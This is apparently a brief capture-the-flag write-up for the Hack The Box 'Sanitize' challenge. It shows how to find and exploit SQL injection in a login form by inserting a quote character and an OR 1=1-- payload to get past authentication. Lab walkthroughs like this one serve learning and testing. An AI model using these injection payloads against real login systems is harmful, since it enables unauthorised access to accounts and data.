HTB — Sanitize

Sanitize landing page:

This application is a login prompt that requires a Username and a Password.

1. Testing the login using admin:admin to see how it behaves. After signing in, it returns back an image and the SQL query used.

2. Let’s forward this is in BurpSuite.

3. Testing special character 'on username parameter. And rendering it on the Burp we can see it throws a SQL error.

4. Testing OR 1=1-- returns back the error 'admin OR 1=1--' .

5. To correct this, we must terminate the admin with another single quote.

And voila!!!

References:

https://app.hackthebox.com/challenges/178